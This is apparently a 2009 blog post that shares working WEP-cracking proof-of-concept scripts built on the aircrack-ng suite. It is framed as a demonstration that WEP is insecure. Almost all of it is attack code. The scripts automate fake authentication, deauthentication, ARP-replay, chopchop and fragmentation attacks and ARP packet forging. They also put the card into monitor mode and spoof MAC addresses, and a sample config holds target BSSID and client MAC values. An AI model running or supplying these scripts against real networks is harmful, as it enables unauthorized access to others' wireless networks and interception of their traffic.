17 Jun 2009

WEP cracking POC with aircrack-ng

Below you'll find my WEP key cracking script crack.sh. I use it in parallel with my capture script cap.sh to demonstrate how easy it is crack WEP. You'll need to create your own crack.conf file (after performing some reconnaissance with Kismet or airodump-ng) and then you'll see how it's easy to crack WEP.

So don't use WEP!

###!/bin/bash
# File: crack.sh
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
SEL=""
msg()
{
echo; echo -n "== $1 "; read retkey
}

prompt()
{
echo; echo -n "== $1 "; read SEL
}

# Check calling args
if [ $# -ne 1 ]
then
echo "Syntax: $0 CONFIGNAME"; exit 1
fi
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}'
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

# Enter network values here
CONFFILE=./crack.conf
if [ ! -x $CONFFILE ]
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
. $CONFFILE $1

msg 'Pls start the capture in a separate terminal'
prompt 'Run fake reauthenticationl? [y]'
if [ "$SEL" = y -o "$SEL" = "" ]
then
# Fake auth
aireplay-ng --fakeauth 0 -e "$essid" -a $bssid -h $mac0 $if
msg 'Check that association was successful'
fi

# Make choice of attack
prompt "Choose (0)deauth, (2)interactive-replay, (3)ARP-replay, (4)chopchop, (5)fragment:"
case $SEL in
0)
msg 'Will attempt deauthentication attack'
aireplay-ng -0 1 -a $bssid -h $mac1 $if
;;
2)
msg 'Will attempt replay attack interactively'
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid -h $mac0 $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
3)
# Chop chop
msg 'Will run ARP replay'
aireplay-ng -3 -e "$ssid" -b $bssid -h $mac0 $if
;;
4|5)
# Chop chop
msg 'Will run Chop chop: choose the one where dest. MAC is not FF:FF:FF:FF:FF:FF'
aireplay-ng --chopchop -e "$ssid" -h $mac0 $if
#aireplay-ng -$SEL -e "$ssid" -b $bssid $if
msg 'Now copy the .cap file name into your clipboard (without .cap)'
prompt 'Enter the base filename here:'
read capfile

# Dump the packet to the screen
msg 'Packets captured will be dumped to the screen'
tcpdump -s 0 -n -e -r $capfile.cap
msg 'Copy the srcIP to clipboard'
echo -n 'Copy the IP here: '; read srcIP
msg 'Copy the dstIP to clipboard'
echo -n 'Copy the IP here: '; read dstIP

# Forge ARP packet
msg 'Will forge ARP packet'
packetforge-ng -0 -h $mac0 -c $mac1 -a $bssid -l $dstIP -k $srcIP -y $capfile.xor -w $arpcapfile

msg 'Will replay interactively from captured file (just select first shown)'
aireplay-ng --interactive -r $arpcapfile $if

#msg 'Will attempt cracking WEP key with IVs received'
#aircrack-ng -a 1 -X -s wepch${channel}*.ivs
;;
esac
=============================================================

###!/bin/bash
# File: cap.sh
PATH=$PATH:/usr/sbin:/sbin:/home/user/bin:/home/eric/bin:/sbin:/usr/sbin:/usr/local/bin:/data/cap
SEL=""
opts=""

#######################################
msg()
{
echo; echo -n "== $1 "; read retkey
}

prompt()
{
echo; echo -n "== $1 "; read SEL
}

usage(){
echo "Syntax: $0 (no args: interactive)"
echo " $0 IF -f CONFIGNAME [AIRODUMP-NG_OPTS]"
echo " $0 IF -c CHANNEL [AIRODUMP-NG_OPTS]"
}
#######################################
readConfig(){
CONFNAME=$1
shift

# Enter network values here
CONFFILE=./crack.conf
if [ ! -x $CONFFILE ]
then
echo Config $CONFFILE is missing! Exiting.
exit 1
fi
echo "-- Reading configuration from $CONFFILE"
. $CONFFILE $CONFNAME
opts="--bssid $bssid" # Filter APs by BSSID
opts="$opts -w $CONFNAME-ch$channel" # Dump file prefix
opts="$opts -t $type" # Filter APs by cipher suite
opts="$opts --band $band" # Band on which airodump-ng should hop (abg)
opts="$opts --channel $channel" # Capture on specific channels
opts="$opts $*"
}
#######################################
capture(){
#opts="$opts --ivs" # Save only captured IVs
#opts="$opts --gpsd" # Use GPSd
opts="$opts --update 2" # Display update delay in seconds
#opts="$opts --showack" # Prints ack/cts/rts statistics
#opts="$opts -h" # Hides known stations for --showack
#opts="$opts -f 1000" # Time in ms between hopping channels
opts="$opts -a" # Filter unassociated clients

if [ "$mac0" != "" ]
then
prompt "Change MAC to $mac0? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor $mac0
fi
else
prompt "Configure for $if for monitoring mode? [n]"
if [ "$SEL" = "y" ]
then
./wlanconfig.sh $if monitor
fi
fi
cmd="airodump-ng $opts $if"
msg "About to run: $cmd"
cd dump
$cmd

prompt "Configure $if back to normal managed mode? [n]"
if [ "$SEL" = "y" ]
then
cd ..
./wlanconfig.sh $if managed
fi
}
#######################################
interact(){
echo "== List of available WLAN interfaces:"
iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort
if=`iwconfig 2>&1 | grep 802.11 | awk '{print $1}' | sort | tail -1`

prompt "Type the interface to capture from: [$if]"
if [ "$SEL" != "" ]
then
if=$SEL
fi

prompt "Use a known configuration? [n]"
if [ "$SEL" = "y" ]
then
prompt "Enter config name:"
readConfig $SEL
return
fi

prompt "Capture on a specific channel? [n]"
if [ "$SEL" = "y" ]
then
channel=1
prompt "Enter channel number: [$channel]"
if [ "$SEL" != "" ]
then
channel=$SEL
fi
opts="--channel $channel"
opts="$opts -w ch$channel" # Dump file prefix
fi
prompt "Filter on cypher (OPN|WEP|WPA|WPA1|WPA2)? [All]"
if [ "$SEL" != "" ]
then
opts="$opts -t $SEL"
fi
}
#######################################

# Check calling args
if [ $# -eq 1 ]
then
usage
exit 1
fi
if [ $# -ge 2 ]
then
if=$1 ; shift;
op=$1 ; shift
else
op=interactive
fi

case $op in
-c)
channel=$1
shift
opts="-w ch$channel" # Dump file prefix
opts="$opts -c $channel" # Capture on specific channels
opts="$opts $*"
capture
;;
-f)
readConfig $*
capture
;;
interact*)
interact $*
capture
;;
*)
usage
esac


=========================================================

###!/bin/bash
# File: wlanconfig.sh
PATH=$PATH:/sbin:/usr/sbin:/usr/local/bin

printUsage(){
echo
echo "Usage: $0 IF MODE [NEWMAC]"
echo
echo "Examples:"
echo " $0 ath0 managed"
echo " $0 ath0 monitor"
echo " $0 wlan0 monitor"
echo " $0 wlan0 monitor 11:22:33:44:55:66"
echo
}

if [ $# -lt 2 ]
then
printUsage
exit 1
fi

case $2 in
managed)
mode=sta
;;
monitor)
mode=monitor
;;
*)
printUsage
exit 1
esac

if=$1
bif=$1
modecmd=$2
mac=$3

echo "-- Bringing $if down"
ifconfig $if down

# Set base interface to wifi0 if it's Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
bif=wifi0
fi

if [ "$mac" != "" ]
then
echo "-- Changing MAC of $bif to $mac"
macchanger --mac $mac $bif
fi

# Special execution for Atheros/madwifi
if [ $if = ath0 -o $if = ath1 ]
then
echo "-- Destroying $if"
wlanconfig $if destroy

echo "-- Creating $if in $modecmd mode"
wlanconfig $if create wlandev $bif wlanmode $mode
else
#airmon-ng stop $if
#airmon-ng start $if
echo "-- Configuring $if for $modecmd mode"
iwconfig $if mode $modecmd
fi

echo "-- Bringing $if up"
ifconfig $if up

==============================================================

# File: Sample crack.conf
#if=wlan1 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)
#if=wifi0 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=ath1 ; mac0=06:23:4D:00:82:7C # Atheros 5007
#if=wlan0 ; mac0=00:1B:2F:A9:D1:B9 # Orig MAC (rtl8087l)

case $1 in
*)
channel=6 # Wireless channel
essid="TESTSSID" # SSID
bssid=00:18:39:C4:F6:85 # MAC of AP
mac0=00:29:2F:E5:AA:15 # Masquerading as internal MAC (if required by AP)
mac1=00:1F:F3:F9:C1:B1 # MAC of known target
# key=C3E07361D029ACEE81234446B4 (saved here after cracking)
type=WEP
band=g
;;
esac

Posted by at
Labels: ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)